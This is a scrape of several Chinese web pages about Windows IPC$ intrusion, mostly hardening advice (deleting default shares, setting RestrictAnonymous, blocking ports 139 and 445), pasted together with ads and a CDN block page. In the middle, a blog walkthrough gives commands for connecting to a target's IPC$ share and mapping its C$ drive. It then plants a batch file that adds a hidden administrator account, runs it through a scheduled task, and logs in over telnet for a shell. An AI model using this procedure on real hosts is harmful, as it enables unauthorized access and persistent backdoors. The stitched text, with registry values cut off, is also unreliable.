如何防范IPC入侵 - 维维软件园
如何防范IPC入侵
来源：不详作者：不详时间： 15:49:00(0)
常荣软件下载资讯频道：　　理论点拨：　　尽可能把帐户密码设置得复杂得一点，这样就可以防止通过IPC$穷举破解，这恐怕也是简单有效的防范IPC$入侵的方法。当然还可以通过其他方法来防范。　　实战解决：　　1、删除IPC$默认共享　　创建一个批处理文件（.bat），内容为：net&share&ipc$&/delete，然后添加到开始菜单中程序组中的“启动”栏内。　　2、禁止建立空连接　　在注册表编辑器窗口找到如下子键并把RestrictAnonymous的键值设置为1，如无此键值请新建之（DWORD类型）：[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]　　3、禁止管理共享　　如果是服务器版，请在注册表编辑器窗口中找到如下主键：[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:。　　如果是专业版版，请在注册表编辑器窗口中找到如下主键：[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:，若无此键，请新建之。　　4、禁用命名管道共享　　依次打开“控制面板”-“管理工具”-“服务”，在“服务”对话窗口找到server服务，双击之，在“常规”选项卡中，把启动类型设置为“已禁用”即可。　　5、关闭通讯窗口　　由于IPC$连接是需要139或445端口来支持的，所以我们可以使用防火墙的端口过滤功能，把139和445端口屏蔽也可达到防范IPC$入侵。
大家还看了：
[访问统计：]
上一篇：下一篇：中国领先的IT技术网站
51CTO旗下网站
ipc$入侵察看本地共享资源怎么防？
ipc$入侵察看本地共享资源，这对于主机和个人隐私是一个非常危险的举动，黑客们非常喜欢偷窥被攻击者的个人信息，以此来达到他们的目的。所以本文将会为大家总结ipc$入侵察看本地共享资源的防御技巧。
作者：佚名来源：网易| 09:18
ipc$入侵能够察看本地共享资源，防御的步骤如下：
运行-cmd-输入net&share
删除共享(每次输入一个）
net&share&ipc$&/delete &&net&share&admin$&/delete &&net&share&c$&/delete &&net&share&d$&/delete（如果有e,f,&&可以继续删除）&
1&禁止空连接进行枚举(此操作并不能阻止空连接的建立)
运行regedit，找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous&=&DWORD的键值改为：1
如果设置为&1&，一个匿名用户仍然可以连接到IPC$共享，但无法通过这种连接得到列举SAM帐号和共享信息的权限；在Windows&2000&中增加了&2&，未取得匿名权的用户将不能进行ipc$空连接。建议设置为1。如果上面所说的主键不存在，就新建一个再改键值。如果你觉得改注册表麻烦，可以在本地安全设置中设置此项：&在本地安全设置－本地策略－安全选项－'对匿名连接的额外限制'
2&禁止默认共享
1）察看本地共享资源
运行-cmd-输入net&share
2）删除共享（重起后默认共享仍然存在）
net&share&ipc$&/delete &&net&share&admin$&/delete &&net&share&c$&/delete &&net&share&d$&/delete（如果有e,f,&&可以继续删除）&
3）停止server服务
net&stop&server&/y&（重新启动后server服务会重新开启）
4）禁止自动打开默认共享（此操作并不能关闭ipc$共享）
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:。
这两个键值在默认情况下在主机上是不存在的，需要自己手动添加，修改后重起机器使设置生效。
3&关闭ipc$和默认共享依赖的服务:server服务
如果你真的想关闭ipc$共享，那就禁止server服务吧：
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-选已禁用，这时可能会有提示说：XXX服务也会关闭是否继续，因为还有些次要的服务要依赖于server服务，不要管它。
4&屏蔽139，445端口&
由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。
1）139端口可以通过禁止NBT来屏蔽
本地连接－TCP/IT属性－高级－WINS－选&禁用TCP/IT上的NETBIOS&一项
2）445端口可以通过修改注册表来屏蔽
添加一个键值
Hive:&HKEY_LOCAL_MACHINE &&Key:&System\Controlset\Services\NetBT\Parameters &&Name:&SMBDeviceEnabled& &&Type:&REG_DWORD &&Value:&0&
修改完后重启机器
注意：如果屏蔽掉了以上两个端口，你将无法用ipc$入侵别人。
3）安装防火墙进行端口过滤
6&设置复杂密码，防止通过ipc$穷举出密码，我觉得这才是最好的办法，增强安全意识，比不停的打补丁要安全的多。
ipc$入侵察看本地共享资源的防御方法你学会了吗？赶快行动起来保护自己的主机安全吧，因为危险无时不在。
【编辑推荐】
【责任编辑： TEL：（010）】
大家都在看猜你喜欢
热点热点热点头条热点
24H热文一周话题本月最赞
讲师：11844人学习过
讲师：12261人学习过
讲师：19344人学习过
精选博文论坛热帖下载排行
这是一个最坏的年代，J2EE Web开发技术已经迟滞多年；这是一个最好的年代，J2EE Web开发技术的新变革留给勇于创新的人！
采用Apusic Opera...
订阅51CTO邮刊1984人阅读
测试环境：主机（windows&XP&sp3）与windows&XP&sp2虚拟机)
&&&通过IPC$与windowsXP建立连接，在现在的绝大多数的XP操作系统中总是会出现问题。以下如何解决在建立IPC$出现的一系列问题。IPC$(Internet&process&connection),通常很多的机子的默认共享都是打开的！在cmd下使用net&share命令是不是发现有很多$，“ipc$&admin$&，c$&，d$.....”（很危险啊）。
现在进入正题：
出现53错误：找不到网络路径，（目标主机打开了系统防火墙或者其他防火墙软件，解决：关闭目标防火墙）
出现1326错误：
1）net&use&\\目标IP\ipc$&&&&/user:&administrator&进行连接，报告系统发生1326错误，登陆失败：未知用户名或密码错误。检查一下我们的命令是否错误或者用户名错误。结果发现无错。
2）在远程机的&控制面板-文件夹选项-查看-简单的文件共享&,去掉选取,然后再尝试连接。简单文件共享会
把网络连接权限都归为&guest连接，是无法访问IPC$等管理共享的.结果发现这个错误，纠正。
紧接着可能出现1327错误：登陆失败：用户帐户限制。可能的原因包括不允许空密码，登陆时间限制，或强制的策略限。&在远程机的&控制面板－管理工具－本地安全策略－安全选项－用户权限&指派里，禁用&空密码用户只能进行控制台登陆&.
映射对方默认共享c盘：net&use&z:&\\目标IP\c$
在我的电脑中会出现网络驱动器
建立ipc$告一段落，删除ipc$连接：net&sue&\\目标IP\ipc$&/del
在此基础上在目标电脑上留下后门账号：
编写一个批处理文件，并拷贝到对方的电脑上，然后增加计划任务执行批处理文件；
批处理命令：（保存为adduser.bat）
net&user&nebulastest&123456&/add&//增加用户nebulastest，密码123456
net&localgroup&administrators&nebulastest&/add&//为用户nebulastest赋予管理员权限
然后在本机上执行命令（已经建立IPC$连接）：copy&adduser.bat&\\目标IP\c$
接着查看目标电脑时间:net&time&\\目标IP
随后为目标电脑增加计划任务：at&\\目标IP&执行时间&c:\adduser.bat
删除当前IPC$链接，使用新用户和新密码建立IPC$链接，以测试时候建立账号成功。
net&use&\\目标IP\ipc$&&123456&&/user:&nebulastest&
（前提:目标电脑已经开启telnet服务）
双击“telnet服务”-----选择“自动”-----点击“启动”
在命令行输入：telnet&目标IP
之后弹出远程登录对话框,选择Y,输入用户名（后门账户，密码）
输入密码不会现在但是回车后会自动验证是否密码正确
下图已经输入密码但是不会显示：
登陆后的界面：
大功告成，获得目标主机shell
&&相关文章推荐
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：66468次
排名：千里之外
原创：20篇
转载：60篇
(5)(2)(1)(1)(1)(1)(3)(1)(2)(1)(2)(9)(2)(1)(1)(5)(1)(6)(2)(1)(2)(21)(7)(3)
(window.slotbydup = window.slotbydup || []).push({
id: '4740881',
container: s,
size: '200,200',
display: 'inlay-fix'怎样防止别人用ipc$和默认共享入侵-网络安全-系统安全-Windows-操作系统-网络学...
我的图书馆
怎样防止别人用ipc$和默认共享入侵-网络安全-系统安全-Windows-操作系统-网络学...
怎样防止别人用ipc$和默认共享入侵
　　空连接和ipc$(internet process connection)是不同的概念。空连接是在没有信任的情况下与建立的会话，换句话说，它是一个到的匿名访问。ipc$是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享，包含了所有的逻辑盘(c$,d$,e$......)和系统目录winnt或windows(admin$)。 A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。　　　　1、先把已有的删除　　　　net share ipc$ /del　　　　net share admin$ /del　　　　net share c$ /del　　　　............(有几个删几个)　　　　2、禁止建立空连接　　　　首先运行regedit，找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous(DWORD)的键值改为:。　　　　3、禁止自动打开默认共享　　　　对于server版，找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:。　　　　对于pro版，则是[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:。
信息来源"岁月联盟"
　　　　如果上面所说的主键不存在，就新建一个再改键值。　　　　B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)　　　　net stop lanmanserver　　　　可能会有提示说，XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。　　　　C、最简单的办法是设置复杂密码，防止通过ipc$穷举密码。但如果你有其他漏洞，ipc$将为进一步入侵提供方便。　　　　D、还有一个办法就是装，或者端口过滤。
TA的最新馆藏[转]&[转]&[转]&[转]&[转]&
喜欢该文的人也喜欢拒绝访问 | www. | 百度云加速
请打开cookies.
此网站 (www.) 的管理员禁止了您的访问。原因是您的访问包含了非浏览器特征(3abf-ua98).
重新安装浏览器，或使用别的浏览器}